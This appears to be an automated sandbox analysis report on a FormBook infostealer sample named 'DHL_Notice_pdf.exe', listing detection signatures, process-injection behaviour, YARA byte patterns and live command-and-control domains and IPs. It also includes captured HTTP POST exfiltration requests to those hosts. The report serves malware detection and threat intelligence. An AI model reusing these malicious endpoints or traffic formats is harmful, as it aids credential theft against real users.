Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Notice_pdf.exe

Overview

General Information

Sample Name:DHL_Notice_pdf.exe
Analysis ID:831175
MD5:771508cf2751f6dabe05758e4fa25fdf
SHA1:f6d7d33b6a340d2c370ca31a6f9677a2e5306486
SHA256:652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL_Notice_pdf.exe (PID: 2080 cmdline: C:\Users\user\Desktop\DHL_Notice_pdf.exe MD5: 771508CF2751F6DABE05758E4FA25FDF)
    • zkvixbqxp.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t MD5: BE5A6985BCDCA9064A05D26CFB8D082E)
      • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • zkvixbqxp.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe MD5: BE5A6985BCDCA9064A05D26CFB8D082E)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5080 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x19e08:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x198a4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19f0a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a082:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18aff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fb7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20b2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.zkvixbqxp.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.zkvixbqxp.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x1ffc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1920a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.zkvixbqxp.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19008:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18aa4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1910a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19282:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17cff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ed7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.zkvixbqxp.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.zkvixbqxp.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.38.8.8.851139532023883 03/21/23-08:08:13.337564
          SID:2023883
          Source Port:51139
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: DHL_Notice_pdf.exeReversingLabs: Detection: 46%
          Source: DHL_Notice_pdf.exeVirustotal: Detection: 42%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==Avira URL Cloud: Label: malware
          Source: http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-XAvira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyz/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfd/hpb7/Avira URL Cloud: Label: phishing
          Source: http://www.amirah.cfdAvira URL Cloud: Label: phishing
          Source: http://www.0dhy.xyz/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-XAvira URL Cloud: Label: malware
          Source: http://www.admet01.clubAvira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/jAvira URL Cloud: Label: malware
          Source: http://www.traindic.topAvira URL Cloud: Label: malware
          Source: http://www.yongleproducts.com/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.admet01.club/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyzAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: bohndigitaltech.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeReversingLabs: Detection: 27%
          Machine Learning detection for sample
          Source: DHL_Notice_pdf.exeJoe Sandbox ML: detected
          Source: 1.2.zkvixbqxp.exe.9f0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.zkvixbqxp.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL_Notice_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: DHL_Notice_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose,5_2_027D31A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 4x nop then xor ebx, ebx3_2_0040DCB4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi5_2_027C8D70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then xor ebx, ebx5_2_027CBEC1

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.160.97 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exeDomain query: www.traindic.top
          Source: C:\Windows\explorer.exeNetwork Connect: 1.13.186.125 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 219.94.129.181 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.231.77 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 67.222.24.48 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 49.212.180.95 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exeDomain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.110 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exeDomain query: www.kunimi.org
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.bisarropainting.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.0dhy.xyz
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: PRIVATESYSTEMSUS PRIVATESYSTEMSUS
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.46.160.97 198.46.160.97
          Source: Joe Sandbox ViewIP Address: 67.222.24.48 67.222.24.48
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 